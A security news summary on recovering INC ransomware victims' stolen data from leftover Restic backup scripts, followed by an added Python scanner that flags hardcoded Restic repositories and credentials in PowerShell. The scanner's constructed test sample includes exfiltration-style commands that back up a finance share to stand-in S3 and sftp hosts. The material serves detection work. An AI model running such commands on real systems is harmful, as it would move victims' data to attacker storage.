INC ransomware data recovered due to operational security lapse
Data Security, Ransomware

As reported by Bleeping Computer, a significant operational security failure by the INC ransomware gang has led to the recovery of data stolen from at least a dozen U.S. organizations. The incident shows how misconfigurations and overlooked artifacts on attacker infrastructure can open avenues for retrieving exfiltrated data.

Cyber Centaurs, a digital forensics firm, uncovered the attacker infrastructure during an investigation into a ransomware attack on a U.S. client. The attackers used a variant of RainINC ransomware and, unexpectedly, left behind remnants of the legitimate backup tool Restic. Although Restic played no part in the encryption itself, its presence indicated that the threat actor's infrastructure was being used to store exfiltrated data. Researchers found PowerShell scripts with hardcoded Restic configuration variables, suggesting that the data repositories persist long after an attack. A controlled enumeration of those repositories confirmed that encrypted data from 12 unrelated U.S. organizations across the healthcare, manufacturing, technology, and service sectors was accessible.

The case underscores the value of thorough forensic analysis and the possibility of recovering data even after a successful exfiltration. The findings have been turned into detection rules to help organizations identify similar attack patterns.

Source: Bleeping Computer
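The report says the investigators got their foothold from PowerShell scripts that carried hardcoded Restic configuration. The scanner below is an added example of what such a triage check can look like; it is not Cyber Centaurs' tooling or code from the report. It assumes the scripts configured Restic through its documented environment variables (RESTIC_REPOSITORY, RESTIC_PASSWORD and the backend credential variables) or through an explicit -r/--repo argument; the PowerShell sample it runs over is constructed for the example and is not a real attacker artifact.

```python
from __future__ import annotations

import re
from dataclasses import dataclass

# Environment variables restic reads for repository location and credentials.
# These are restic's documented names; that the attacker scripts used exactly
# these is an assumption of this example, not something the report states.
RESTIC_ENV_VARS = {
    "RESTIC_REPOSITORY": "repository location",
    "RESTIC_PASSWORD": "repository password",
    "AWS_ACCESS_KEY_ID": "S3 access key",
    "AWS_SECRET_ACCESS_KEY": "S3 secret key",
    "B2_ACCOUNT_ID": "Backblaze B2 account",
    "B2_ACCOUNT_KEY": "Backblaze B2 key",
}
SECRET_VARS = {"RESTIC_PASSWORD", "AWS_SECRET_ACCESS_KEY", "B2_ACCOUNT_KEY"}
REPO_NAMES = {"RESTIC_REPOSITORY", "restic -r"}

# PowerShell assignment form:  $env:NAME = "value"  /  $env:NAME = 'value'
ENV_ASSIGN_RE = re.compile(
    r'\$env:(?P<name>[A-Za-z_][A-Za-z0-9_]*)\s*=\s*(?P<q>["\'])(?P<value>.*?)(?P=q)',
    re.IGNORECASE,
)
# .NET form:  [Environment]::SetEnvironmentVariable("NAME", "value")
SET_ENV_RE = re.compile(
    r'SetEnvironmentVariable\(\s*(?P<q1>["\'])(?P<name>[^"\']+)(?P=q1)\s*,\s*'
    r'(?P<q2>["\'])(?P<value>.*?)(?P=q2)',
    re.IGNORECASE,
)
# restic invocation with the repository on the command line:  restic.exe -r <repo> ...
RESTIC_CMD_RE = re.compile(
    r'\brestic(?:\.exe)?\b[^\r\n]*?(?:-r|--repo)\s+(?P<q>["\']?)(?P<repo>[^\s"\']+)(?P=q)',
    re.IGNORECASE,
)
# Remote backend schemes restic accepts in a repository string; anything else is a local path.
BACKEND_RE = re.compile(r"^(s3|b2|sftp|rest|rclone|azure|gs|swift):", re.IGNORECASE)


@dataclass
class Finding:
    line: int    # 1-based line in the script
    kind: str    # "env", "setenv" or "cmd"
    name: str    # variable name, or "restic -r" for a command-line repo
    value: str   # the hardcoded value
    note: str    # what the value is


def scan_powershell(text: str) -> list[Finding]:
    """Return every hardcoded Restic repository/credential setting found in a PowerShell script."""
    findings: list[Finding] = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for m in ENV_ASSIGN_RE.finditer(line):
            name = m.group("name").upper()
            if name in RESTIC_ENV_VARS:
                findings.append(Finding(lineno, "env", name, m.group("value"), RESTIC_ENV_VARS[name]))
        for m in SET_ENV_RE.finditer(line):
            name = m.group("name").upper()
            if name in RESTIC_ENV_VARS:
                findings.append(Finding(lineno, "setenv", name, m.group("value"), RESTIC_ENV_VARS[name]))
        for m in RESTIC_CMD_RE.finditer(line):
            findings.append(Finding(lineno, "cmd", "restic -r", m.group("repo"), "repository passed on command line"))
    return findings


def backend_of(repo: str) -> str:
    """Backend scheme of a restic repository string ('local' for a plain path)."""
    m = BACKEND_RE.match(repo)
    return m.group(1).lower() if m else "local"


def summarize(findings: list[Finding]) -> dict:
    """Collapse findings into the facts an investigator acts on: where the data sits and whether
    the script also leaks the secrets needed to open it."""
    repos = sorted({f.value for f in findings if f.name in REPO_NAMES})
    return {
        "repositories": repos,
        "backends": sorted({backend_of(r) for r in repos}),
        "secrets": sorted({f.name for f in findings if f.name in SECRET_VARS}),
    }


# Constructed sample resembling a staging script; not a real attacker artifact.
SAMPLE_SCRIPT = r'''# Constructed sample resembling a staging script; not a real attacker artifact.
$env:RESTIC_REPOSITORY = "s3:s3.example.invalid/stage-bucket"
$env:RESTIC_PASSWORD = 'hunter2'
$env:AWS_ACCESS_KEY_ID = "AKIAEXAMPLEKEY"
$env:AWS_SECRET_ACCESS_KEY = "EXAMPLESECRET"
$env:PATH = "C:\tools;" + $env:PATH
& "C:\tools\restic.exe" backup "C:\Shares\Finance" --tag exfil
& "C:\tools\restic.exe" -r sftp:user@198.51.100.7:/backups snapshots
'''

if __name__ == "__main__":
    found = scan_powershell(SAMPLE_SCRIPT)
    for f in found:
        print(f"line {f.line:>3} [{f.kind}] {f.name} = {f.value!r}  ({f.note})")
    print(summarize(found))
```

A script that yields both a repository location and RESTIC_PASSWORD (plus the backend credentials) is exactly the situation the report describes: with those values an investigator can list the repository's snapshots with restic's own client, which is the "controlled enumeration" that confirmed the other victims' data. The same indicators, restic.exe executing on a host where no backup job is sanctioned and RESTIC_* variables appearing in process environments, are a reasonable basis for an endpoint detection rule.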
